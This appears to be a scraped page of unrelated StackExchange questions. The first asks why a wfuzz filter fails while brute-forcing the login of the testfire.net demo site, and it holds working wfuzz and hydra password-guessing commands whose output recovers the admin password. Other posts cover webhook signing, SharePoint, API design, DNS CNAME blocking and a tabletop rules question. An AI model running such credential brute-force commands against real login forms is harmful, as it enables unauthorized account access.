wfuzz show –hs responses when it should hide it

Test site: http://testfire.net/login.jsp

Error when login failed: Login Failed: We're sorry, but this username or password was not found in our system. Please try again.

Web Form

<form action="doLogin" method="post" name="login" id="login" onsubmit="return (confirminput(login));">           <table>             <tbody><tr>               <td>                 Username:               </td>               <td>                 <input type="text" id="uid" name="uid" value="" style="width: 150px;">               </td>               <td>               </td>             </tr>             <tr>               <td>                 Password:               </td>               <td>                 <input type="password" id="passw" name="passw" style="width: 150px;">                 </td>             </tr>             <tr>                 <td></td>                 <td>                   <input type="submit" name="btnSubmit" value="Login">                 </td>               </tr>           </tbody></table>         </form> 

The actual password is admin too. Therefore, I created simple passlist.txt for this purpose.

wolf@linux:~$   cat passlist.txt  admin pwd pass password wolf@linux:~$    

wfuzz flag

--ss/hs regex             : Show/Hide responses with the specified regex within the content 

Here are few tests, but none of them really work.

wfuzz -cz file,passlist.txt –hs Failed -d “uid=admin&passw=FUZZ&btnSubmit=Login” http://testfire.net/doLogin

wolf@linux:~$   wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/doLogin  Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.  ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer                         * ********************************************************  Target: http://testfire.net/doLogin Total requests: 4  =================================================================== ID           Response   Lines    Word     Chars       Payload                                                                           ===================================================================  000000003:   302        0 L      0 W      0 Ch        "pass"                                                                            000000004:   302        0 L      0 W      0 Ch        "password"                                                                        000000001:   302        0 L      0 W      0 Ch        "admin"                                                                           000000002:   302        0 L      0 W      0 Ch        "pwd"                                                                              Total time: 0.517212 Processed Requests: 4 Filtered Requests: 0 Requests/sec.: 7.733766  wolf@linux:~$    

wfuzz -cz file,passlist.txt –hs Failed -d “uid=admin&passw=FUZZ&btnSubmit=Login” http://testfire.net/login.jsp

wolf@linux:~$   wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/login.jsp  Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.  ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer                         * ********************************************************  Target: http://testfire.net/login.jsp Total requests: 4  =================================================================== ID           Response   Lines    Word     Chars       Payload                                                                           ===================================================================  000000003:   200        194 L    582 W    8519 Ch     "pass"                                                                            000000001:   200        194 L    582 W    8519 Ch     "admin"                                                                           000000002:   200        194 L    582 W    8519 Ch     "pwd"                                                                             000000004:   200        194 L    582 W    8519 Ch     "password"                                                                         Total time: 0.583132 Processed Requests: 4 Filtered Requests: 0 Requests/sec.: 6.859507  wolf@linux:~$    

It didn’t work even thought the right user/pass combination was there.

Any idea what’s wrong in this wfuzz syntax?

hydra can do this without any problem and identified the credential accurately.

wolf@linux:~$   hydra testfire.net http-post-form \ > '/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed' \ > -l admin -P passlist.txt -V Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 08:57:36 [DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task [DATA] attacking http-post-form://testfire.net:80/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed [ATTEMPT] target testfire.net - login "admin" - pass "admin" - 1 of 4 [child 0] (0/0) [ATTEMPT] target testfire.net - login "admin" - pass "pwd" - 2 of 4 [child 1] (0/0) [ATTEMPT] target testfire.net - login "admin" - pass "pass" - 3 of 4 [child 2] (0/0) [ATTEMPT] target testfire.net - login "admin" - pass "password" - 4 of 4 [child 3] (0/0) [80][http-post-form] host: testfire.net   login: admin   password: admin 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 08:57:39 wolf@linux:~$    

I am signing (HMAC) outgoing webhooks to allow users to verify their source, should I also sign outgoing responses?

To allow api users to verify the authenticity of outgoing webhooks, I am using a similar model to slack:

  • Concatenate timestamp and body, HMAC with pre-shared key, add timestamp and HMAC digest to headers.

  • Recipient does the same, and compares to the digest in the header.

I can either implement this exclusively on outgoing webhooks, or I can implement it as middleware that performs this process on both outgoing webhooks, and responses to requests.

Is doing the latter good practice? A good idea?

Limits on responses in SP survey

I want to design a survey in SP 2016 as an event reservation form, with a choice of times available. Since each time would have only a fixed number of spaces available, can each selection have a separate limit on spaces available?

Also, I want to reserve spaces for a certain group of users. But instead of blocking their access to the form with the default “No permissions” message, I want to display a friendly message that says they’re already signed up.

How much of that can be done in the XSLT through SP Designer?

Mystic UA: are Exacting Query responses given vocally or telepathically?

The 2017 UA Mystic has various Psionic Disciplines. Under Telepathic Contact is an option called Exacting Query, whose description states:

Exacting Query (2 psi). As an action, you target one creature you can communicate with via telepathy. The target must make an Intelligence saving throw. On a failed save, the target truthfully answers one question you ask it via telepathy. On a successful save, the target is unaffected, and you can’t use this ability on it again until you finish a long rest. A creature is immune to this ability if it is immune to being charmed.

This question is asked via telepathy, but is it answered via telepathy or vocally? The Mystic’s telepathy (gained at level 2) seems to be described as only operating one way (from the Mystic to any creature the Mystic can see within 120 feet). So does this imply that the answer to an Exacting Query would be vocal?

Embedding Microsoft forms in SharePoint online to show (Questions and Responses) – Classic mode

I would like to use the Microsoft forms for a quick poll on an intranet (Classic mode) and was wondering if there is a way to redirect the user to the responses page/link after a survey or poll has been submitted? Or a way to have the questions and responses tabbed side by side?

Any resources or tips would be appreciated

How detailed should API responses be?

I would like to define rules that describe how detailed an API response should be.


To save you the effort of reading: It is of course also possible to keep the whole thing in the API documentation, but I am asking for an exact rule / best practise.

And by the way, I am not using ORM tools, I write plain SQL.


Let’s say there are the resources user and group. Users can have multiple groups and groups can have multiple users. When asking for a User by ID, would you also return the groups he is in? Would this group array only contain the IDs or contain detailed group objects?

If the group objects were detailed, there would be a risk that they would again contain user objects (cycles => users have groups which have users…). It is also possible that some nested objects are relevant and others are not. Some nested objects may need to be provided.

If you ask for a user, the database will only return the user. If the group should be supplied as an attribute, the query would have to be extended.

I am now also thinking of the extensibility of the API. When do I only return the user, when do I return a user with all its groups? I want to keep the API structure clean. Given these example routes

  • /users => return all users

  • /users/:id => return one user by user id

how would you decide which nested objects should be returned?

If you want to generalize the whole thing now, are there fixed rules?

Securing DNS by blocking querys AND responses [Dnscrypt questions]

Visiting facebook.com you will query s.update.fbsbx.com. s.update.fbsbx.com is a CNAME to s.agentanalytics.com. Currently, the only way to block s.agentanalytics.com is to block s.update.fbsbx.com via hosts. Windows DNS client, and even wildcard blocking resolvers such as Dnscrypt do not have the ability to block parent domains of CNAME replies.

13:19:30 dnsmasq[1211]: query[A] s.update.fbsbx.com from 192.168.50.142 13:19:30 dnsmasq[1211]: forwarded s.update.fbsbx.com to 127.0.0.1 13:19:30 dnsmasq[1211]: reply s.update.fbsbx.com is <CNAME> 13:19:30 dnsmasq[1211]: reply s.agentanalytics.com is <CNAME> 13:19:30 dnsmasq[1211]: reply agentanalytics.com is 52.20.233.11 13:19:30 dnsmasq[1211]: reply agentanalytics.com is 35.170.177.215 13:19:30 dnsmasq[1211]: reply agentanalytics.com is 34.235.44.232 13:19:30 dnsmasq[1211]: reply agentanalytics.com is 34.194.252.192 13:19:30 dnsmasq[1211]: reply agentanalytics.com is 18.206.130.128 13:19:30 dnsmasq[1211]: reply agentanalytics.com is 52.202.107.183 13:19:30 dnsmasq[1211]: reply agentanalytics.com is 18.209.97.44 13:19:30 dnsmasq[1211]: reply agentanalytics.com is 35.173.82.169 13:19:30 dnsmasq[1211]: reply agentanalytics.com is 23.22.178.204 13:19:30 dnsmasq[1211]: reply agentanalytics.com is 18.206.103.1 

Sometimes there may be multiple CNAMES that reveal their actual hidden associations in replies, example:

13:55:28 dnsmasq[26607]: query[A] su.itunes.apple.com from 192.168.50.96 13:55:28 dnsmasq[26607]: forwarded su.itunes.apple.com to 127.0.0.1  13:55:29 dnsmasq[26607]: reply su.itunes.apple.com is <CNAME> 13:55:29 dnsmasq[26607]: reply su-cdn.itunes-apple.com.akadns.net is <CNAME> 13:55:29 dnsmasq[26607]: reply su-applak.itunes-apple.com.akadns.net is <CNAME> 13:55:29 dnsmasq[26607]: reply su.itunes.apple.com.edgekey.net is <CNAME> 13:55:29 dnsmasq[26607]: reply e673.dsce9.akamaiedge.net is 184.50.162.217  13:55:29 dnsmasq[26607]: query[A] xp.apple.com from 192.168.50.96 13:55:29 dnsmasq[26607]: forwarded xp.apple.com to 127.0.0.1 13:55:29 dnsmasq[26607]: reply xp.apple.com is <CNAME> 13:55:29 dnsmasq[26607]: reply xp.itunes-apple.com.akadns.net is <CNAME> 13:55:29 dnsmasq[26607]: reply xp.apple.com.edgekey.net is <CNAME> 13:55:29 dnsmasq[26607]: reply e17437.dscb.akamaiedge.net is 23.214.192.96 

DNSCRYPT allows wildcard blocking of outgoing domain queries for example [analytics] but it will not block incoming responses nor the caching of s.agentanalytics.com ips. Or for example, if one blocks s.agentanalytics.com in windows hosts, or dnscrypt, it will still be accessible via s.update.fbsbx.com. I showed dnscrypt’s coder how this analytics domain bypasses his wildcard protections, and he told me “These entries are not within the parent zone and are ignored by all stub resolvers.” And here he goes into more detail

Is this incorrect?

If these IP’s are ignored by the stub resolver [that includes windows DNS client] as he previously claimed, why are they cached to begin with? are these IP’s potentially usable by a state party/MITM? as suggested here? I saw s.update.fbsbx.com in Umatrix, what ip then would it be associated with except s.agentanalytics.com ip addresses?

If he is incorrect, if DNSCRYPT wildcard blocks refused caching these ip responses one could better secure their networks.

Here is another example, of 21 queries occur when an Iphone immediately connects to WIFI, responses include 72 domains & IP’s that are not in the parent domain. He is saying this is all ignored.

Here, https://pastebin.com/GYSEw1dY

Microsoft Flow Record Form responses in SharePoint Yes/No

This is my first time on StackExchange, and I haven’t found the answer to my question in the forum…

I have built a Form in order to get some data recorded into a SharePoint list using Flow. I would like to fill a SharePoint item with the format type Yes/No. In Flow, I cannot even select a field from the Form I made (I setup some other SharePoint items and it worked like a charm).

Can you please let me know how to format the question in Form, and how to setup my Flow?

Many thanks in advance!

Should i hash responses from server?

I am hashing all requests to my server with a secret token known by only the server and my mobile app, to prevent malicious apps from using my servers.

Should I also do this on the responses from the server, to validate the servers identity in the app, or would this be useless?

Im of course using HTTPS already, and pinned certificates.